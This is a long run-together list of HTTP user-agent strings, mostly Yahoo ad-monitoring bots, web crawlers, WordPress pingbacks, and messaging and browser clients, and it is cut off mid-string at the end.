tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633939095-0 +Screaming Frog SEO Spider/16.2 Beta 4 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 +WordPress/5.8.1; https://www.tecplac.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633911152-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633911149-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633922130-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633922134-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633970204-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.1; SM-J701F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633911153-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633970204-60 +ddg_android/5.97.0 (com.duckduckgo.mobile.android; Android API 29) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633970203-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.1.1; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633911150-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633922131-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633970205-10 +AmigaOS 4.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94 Tablet Safari/537.36) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633954493-0 +https://user-agents.net/string/https-user-agents-net-string-ddg-android-5-95-0-com-duckduckgo-mobile-android-android-api-28 +Apache-HttpClient/4.5.10 (Java/11) +Snapchat/10.62.0.0 (SM-G973F; Android 10#G973FXXU4CTC9#29; gzip) V/MUSHROOM +Snapchat/10.62.0.0 (SM-G973F; Android 10#G973FXXS7CTF3#29; gzip) V/MUSHROOM +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:157.55.39.120 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633997795-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634010462-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634000990-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634013624-20 +WordPress/5.7; https://test108.gtm-plus.com +Apache-HttpClient/4.5.2 (Java/1.8.0_302) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633997796-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634010463-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634000747-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634003899-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634006934-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634013420-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634018494-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634025901-10 +
    nginx
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634043158-10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634078748-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634004286-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634017131-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634019402-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634025923-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634028039-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634043773-0 +WordPress.com; http://jqvx.s19.xrea.com/wp1 +WordPress/5.8.1; https://www.tecdud.com +WordPress.com; https://fedy.net +WhatsApp/2.21.18.14 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633997792-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633997797-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634010464-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634010460-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4531.2 Safari/537.36 OPR/77.0.4054.275 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 5.0.2; SM-G600FY ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633997798-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634010465-0 +WordPress/5.8.1; https://autolidergroup.ru +WordPress/5.8.1; https://biyoterapi.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633997795-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634010461-0 +WordPress/5.8.1; http://s25.codepre.com +curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.44 zlib/1.2.8 libidn/1.18 libssh2/1.4.2 +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html), XFF:72.14.199.158 +WhatsApp/2.21.21.7 A +GuzzleHttp/6.5.5 curl/7.70.0 PHP/7.4.13 +WhatsApp/2.21.200.15 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634084217-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634097528-10 +WordPress/5.8.1; https://blog.remitly.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634084218-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634097529-10 +WhatsApp/2.21.20.18 A +WordPress/5.8.1; https://ukcatihome.ipsos.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634091124-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634093240-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634098290-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634098293-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634098347-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634104211-0 +WhatsApp/2.21.21.8 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634084213-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634084219-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634085415-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634097526-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634097530-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634098917-0 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/94.0.4606.81Safari/537.36 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/94.0.4606.81 Mobile Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634084220-0 +Apache-HttpClient/4.5.6 (Java/15.0.2) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634084216-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634097528-0 +WordPress/5.8; https://fsin-dostavka.su +Apache/4.0 (RHEL9; compatible; Googlebot/2.1) +WordPress/5.8.1; https://techilife.animei.xyz +GoogleAuth/1.4 (beyond0q RP1A.200720.012); gzip,gzip(gfe),gzip(gfe) +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html), XFF:72.14.199.154 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1634176500-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634189960-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1634226831-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634170502-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634183485-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634183499-10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634198800-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634217615-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634222158-10 +Apache-HttpClient/4.5.10 (Java/11.0.12) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634176810-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634190914-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634219866-0 +WhatsApp/2.21.19.22 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634237940-0 +Y!J-BRW/1.0 (https://support.yahoo-net.jp/PccSearch/s/article/H000007955) +WordPress/5.8.1; https://exotips.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634170500-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634170503-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634175583-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634183463-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634183500-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634190437-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.3 Mobile Safari/537.36 PTST/200810.150824 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.40 Mobile Safari/537.36 PTST/210331.204756 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634170504-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634183501-0 +ddg_android/5.98.1 (com.duckduckgo.mobile.android; Android API 26) +ddg_android/5.94.3 (com.duckduckgo.mobile.android; Android API 26) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634170501-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634183465-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.k8s.crawler-production/1634247819-0 +Apache-HttpClient/4.5.2 +grpc-java-cronet/1.40.0-SNAPSHOT,gzip(gfe) +AdsBot-Google (+http://www.google.com/adsbot.html), XFF:72.14.199.156 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634306489-0 +WordPress/5.8.1; https://adamnaamani.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634256973-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634269784-10 +PHP/6.3.45 +PHP/6.2.10 +WordPress/5.7.2; https://www.apt-contigo.com.mx +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634256974-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634269785-10 +WhatsApp/2.21.21.9 A +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-26@moz.com) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634316626-10 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) adbeat.com/policy Gecko/20100101 Firefox/92.0 +WhatsApp/2.21.21.10 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634263603-0 +Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634276059-0 +WhatsApp/2.21.20.20 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634256976-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634256970-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634262950-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634269783-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634269786-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634275418-0 +WordPress/5.8.1; https://tiptop-fitness.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 5.1.2; SM-J701F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634256977-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634269825-0 +ddg_android/5.98.1 (com.duckduckgo.mobile.android; Android API 30) +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1634300273-60 +ddg_android/5.97.0 (com.duckduckgo.mobile.android; Android API 28) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634256972-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634269784-0 +WhatsApp/2.2140.7 N +WordPress/5.8.1; http://a.codepre.com/s5 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:40.77.167.28 +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268, XFF:5.255.253.151 +Apache-HttpClient/4.5.10 (Java/13.0.2) +Mozilla/5.0 (compatible; OrtingoBot/2.0; +https://ortingo.com/ortingobot) [More detail: OrtingoBot is a web crawler for the search engine, Ortingo. If you would like your entire site, or specific parts of your site to not be crawled by our bot, please inquire us at hello@ortingo.com, and we will happily cease the crawling. Note: Version 2.0 of OrtingoBot is a re-engineered version of our older version, 1.0, designed for being more accurately compliant with robots.txt files, or the Robots Exclusion Standard.] +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634343250-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634354575-10 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 8.0.0; SM-N910H ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634343251-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634354576-10 +WordPress/5.8.1; https://www.coolesteledevices.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.1.2.571 (SpeedMode; Proxy; Android 6.0.1; SM-G532F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634348577-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634356121-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634359889-0 +WordPress/5.8.1; https://www.tecmaza.com +Apache-HttpClient/4.5.13 (Java/1.8.0_302-heroku) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634427375-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; 